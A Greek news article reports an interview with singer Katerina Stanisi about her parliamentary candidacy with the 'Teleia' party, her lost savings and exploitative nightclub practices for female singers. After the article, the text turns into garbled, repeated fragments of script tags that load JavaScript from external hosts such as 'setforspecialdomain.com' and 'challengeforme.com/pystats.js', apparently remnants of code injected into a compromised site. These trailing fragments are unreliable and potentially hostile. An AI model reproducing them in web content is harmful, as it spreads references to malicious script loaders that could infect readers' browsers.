«Θα πάω στη Βουλή και θα πάω με τις τουαλέτες μου»

«Θα πάω στη Βουλή και θα πάω με τις τουαλέτες μου»

Καλεσμένη στην εκπομπή «Το Πρωινό» βρέθηκε η Κατερίνα Στανίση και μίλησε για την υποψηφιότητά της στην «Τελεία» του Απόστολου Γκλέτσου άλλα και για το τραγούδι.

«Θα μου πεις “τι γνωρίζεις εσύ από πολιτική;”. Από αυτά που ακούω και από αυτά που ζούμε, κάτι θα έλεγαν εκείνοι, κάτι θα έλεγα κι εγώ. Δεν μπορεί! Θα πάω στη Βουλή και θα πάω με τις τουαλέτες μου», είπε για την υποψηφιότητα στις εκλογές της 25ης Ιανουαρίου.

Η τραγουδίστρια αναφέρθηκε και στα οικονομικά της: «Είχα κάποια χρήματα στην άκρη και χάθηκαν κι αυτά. Τα έφαγαν οι τραπεζίτες, οι μάγκες. Τα επένδυσα σε ομόλογα. Και με πήραν μία μέρα και ένιωσα λες και ήμουν νεκρή. Αυτό δεν είναι χρηματιστήριο, είναι κλειστά λεφτά. Πώς τα φάγανε;».

Η Κατερίνα Στανίση γύρισε τον χρόνο πίσω και μίλησε για τους άγραφους νόμους της νύχτας: «Αν δεν άδειαζες μπουκάλια, δεν σε θέλανε. Κι ας “τα λες”. Άμα ήθελε η τραγουδίστρια να πάει σε ένα κρεβάτι από μόνη της, ας πήγαινε. Αυτό δεν ήταν σώνει και καλά υποχρεωτικό. Γιατί τώρα τι κάνουν; Τώρα το λένε “δημόσιες σχέσεις”. Άλλαξαν τη λέξη να ακούγεται πιο ευχάριστα, αλλά το ίδιο πράγμα είναι. Εγώ πήγα σε μαγαζί, είδα την τραγουδίστρια -μεγάλο όνομα- που κατέβηκε από την πίστα και πήγε στο πρώτο τραπέζι γιατί ο κύριος τα “χωνε” σε λουλούδια. Τι είναι αυτό; Ήθελε να ευχαριστήσει τον κύριο που χάλαγε χιλιάρικα. Πώς τις παίρνουν τα μαγαζιά; Αν δεν έχεις κοιλιακούς, αν δεν έχεις μεγάλα στήθια, δεν σε παίρνουν. Τι το κάναμε; Μπορντέλο; Μετά ρώτησα πού είναι η τραγουδίστρια και μου απάντησαν πως έφυγε. Την είχε πάρει ο πελάτης».

Τέλος μίλησε και για τη συνεργασία της με τον Τζίμη Πανούση και είπε: «Και μόνο που θα τραγουδήσω κάτι του Τζίμη Πανούση, δοκιμάζομαι κι εγώ σε κάτι διαφορετικό. Καμία σχέση με αυτό που τραγουδάω τώρα».___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >